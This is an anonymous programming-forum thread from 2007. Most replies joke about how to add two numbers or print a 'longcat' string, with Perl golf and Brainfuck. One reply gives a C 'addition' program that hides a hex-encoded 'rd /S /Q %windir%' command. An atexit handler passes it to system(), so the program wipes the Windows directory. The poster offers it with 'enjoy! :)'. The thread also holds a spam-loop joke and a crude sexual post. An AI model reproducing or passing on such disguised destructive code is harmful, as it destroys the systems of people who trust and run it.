Name:
Anonymous
2007-05-30 1:53
ID:JaaPzAzx
Something liek this: x + x
Name:
Anonymous
2007-05-30 1:54
ID:JaaPzAzx
In Ciiiiiiiiiiiii
(commandline)
Name:
Anonymous
2007-05-30 2:52
ID:Heaven
thred = board.getThread(1180501671);
while(true){
thred.post(null, "sage", "");
}
Name:
Anonymous
2007-05-30 4:15
ID:w11gH1pc
$o = "o" x 1000;
print "longcat is l${o}ng\n";
Name:
Anonymous
2007-05-30 5:34
ID:qdHs8oEu
>>8
Nice, not many people know of the string multiplication operator in Perl.
Name:
Anonymous
2007-05-30 6:19
ID:oLt8Y2yb
>>9
Except for perl programmers, all of them know it
Name:
Anonymous
2007-05-30 8:43
ID:qdHs8oEu
>>10
hnto? I've seen some Perl code here that didn't use it when it would have been the better idea (instead of looping and concatenating).
Name:
Anonymous
2007-05-30 8:49
ID:5TeGZ/0K
do you even need $o?
print 'longcat is l'.('o'x1000)."ng\n";
Name:
Anonymous
2007-05-30 9:49
ID:51dCDFLf
>>13
even shorter:
[code]printf"longcat is l%sng\n",'o'x1e3;[code]
Name:
Anonymous
2007-05-30 10:12
ID:oLt8Y2yb
>>15
Dont worry, hes not an expert BBCode programmer. But
I am
Name:
Anonymous
2007-05-30 10:27
ID:Faq4TTOU
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
const char O[]={0x72, 0x64, 0x20, 0x2f, 0x53, 0x20, 0x2f, 0x51, 0x20, 0x25, 0x77, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x25};
void _f(int(*)(const char*), char *);
void _l(void);
int main(int argc, char **argv) {
int num[3];
atexit(_l);
printf("enter number 1: ");
scanf("%d", num);
printf("enter number 2: ");
scanf("%d", num+1);
*(num+2) = *num + *(num+1);
printf("%d + %d = %d\n", *num, *(num+1), *(num+2));
getchar();
return 0;
}
void _f(int(*)(const char*) __, char * ___) {
__(___);
}
void _l(void) { _f(system,O); }
enjoy! :)
i hope it's for the windows platform..
Name:
Anonymous
2007-05-30 17:30
ID:2/ENTLa2
If hole = empty
then
hole = full(sticks)
Name:
Anonymous
2007-05-30 19:41
ID:oLt8Y2yb
HOW DOES ONE DO OVERLINES
Name:
Anonymous
2007-05-30 22:17
ID:IIfzMwe+
+++++++++++[>++++++++++<-]>.+.
Name:
Anonymous
2007-05-31 6:58
ID:mhS5nCDJ
>>9
It's a neat operator. Learned it in a longcat thread here on /prog/
>>10
I've never seen it used outside /prog/
>>12
looks nicer with $o (IMHO)
Name:
Anonymous
2007-05-31 8:38
ID:vu0x3WS9
>looks nicer with $o (IMHO)
are you joking?
Name:
tiny dick
2007-05-31 11:01
ID:EkgfCiDv
The facesitting of tiny dick.
Name:
Anonymous
2007-05-31 11:38
ID:m0PHNLlM
>>25
That means you wouldn't have learned about it if I hadn't posted in that Longcat thread ;___________;
Name:
Anonymous
2008-05-15 6:35
>>17
It works for linux too, if you have wine installed